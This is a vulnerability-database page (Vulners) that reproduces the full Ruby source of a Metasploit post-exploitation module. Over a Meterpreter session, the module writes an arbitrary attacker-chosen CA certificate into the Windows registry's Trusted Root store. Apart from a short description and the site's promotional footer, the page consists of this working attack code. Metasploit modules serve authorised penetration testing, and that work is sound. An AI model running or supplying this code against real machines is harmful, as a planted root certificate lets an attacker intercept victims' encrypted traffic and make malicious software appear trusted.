Lucene search
K

Windows Manage Certificate Authority Injection

🗓️ 23 Oct 2011 17:17:32Reported by vt <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 30 Views

Windows Manage Certificate Authority Injection module allows attacker to insert an arbitrary CA certificate into victim's Trusted Root store

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Post

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Manage Certificate Authority Injection',
        'Description' => %q{
          This module allows the attacker to insert an arbitrary CA certificate
          into the victim's Trusted Root store.
        },
        'License' => BSD_LICENSE,
        'Author' => [ 'vt <nick.freeman[at]security-assessment.com>'],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_registry_create_key
              stdapi_registry_open_key
            ]
          }
        }
      )
    )

    register_options(
      [
        OptString.new('CAFILE', [ true, 'Path to the certificate you wish to install as a Trusted Root CA.', ''])
      ]
    )
  end

  def run
    certfile = datastore['CAFILE']

    # Check file path
    begin
      ::File.stat(certfile)
    rescue StandardError
      print_error('CAFILE not found')
      return
    end

    cert = ''

    # Load the file
    f = ::File.open(certfile, 'rb')
    cert = f.read(f.stat.size)
    f.close

    loadedcert = OpenSSL::X509::Certificate.new(cert)
    certmd5 = Digest::MD5.hexdigest(loadedcert.to_der).scan(/../)
    certsha1 = Digest::SHA1.hexdigest(loadedcert.to_der).scan(/../)
    cskiray = loadedcert.extensions[0].value.gsub(/:/, '').scan(/../)

    derLength = loadedcert.to_der.length.to_s(16)
    if (derLength.length < 4)
      derLength = "0#{derLength}"
    end

    derRay = derLength.scan(/../)
    hexDerLength = [ derRay[1], derRay[0] ]

    certder = loadedcert.to_der.each_byte.collect { |val| '%02X' % val }

    bblob = [ '04', '00', '00', '00', '01', '00', '00', '00', '10', '00', '00', '00' ]
    bblob += certmd5
    bblob += [ '03', '00', '00', '00', '01', '00', '00', '00', '14', '00', '00', '00' ]
    bblob += certsha1
    bblob += [ '14', '00', '00', '00', '01', '00', '00', '00', '14', '00', '00', '00' ]
    bblob += cskiray
    bblob += [ '20', '00', '00', '00', '01', '00', '00', '00' ]
    bblob += hexDerLength
    bblob += [ '00', '00' ]
    bblob += certder

    blob = bblob.map(&:hex).pack('C*')

    cleancertsha1 = certsha1.to_s.gsub(/[\s\[\\"\]]/, '').gsub(/,/, '').upcase
    catree = 'HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\ROOT\\Certificates'
    entire_key = "#{catree}\\#{cleancertsha1}"
    root_key, base_key = client.sys.registry.splitkey(entire_key)

    # Perform the registry operations

    # Ensure the cert doesn't already exist
    begin
      open_key = nil
      open_key = client.sys.registry.open_key(root_key, base_key, KEY_READ + 0x0000)
      values = open_key.enum_value
      if !values.empty?
        print_error('Key already exists!')
        return
      end
    rescue StandardError
      open_key = nil
      open_key = client.sys.registry.create_key(root_key, base_key, KEY_WRITE + 0x0000)
      print_good("Successfully created key: #{entire_key}")

      open_key.set_value('Blob', REG_BINARY, blob)
      print_good('CA inserted!')
    end
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Feb 2023 13:47Current
1Low risk
Vulners AI Score1
30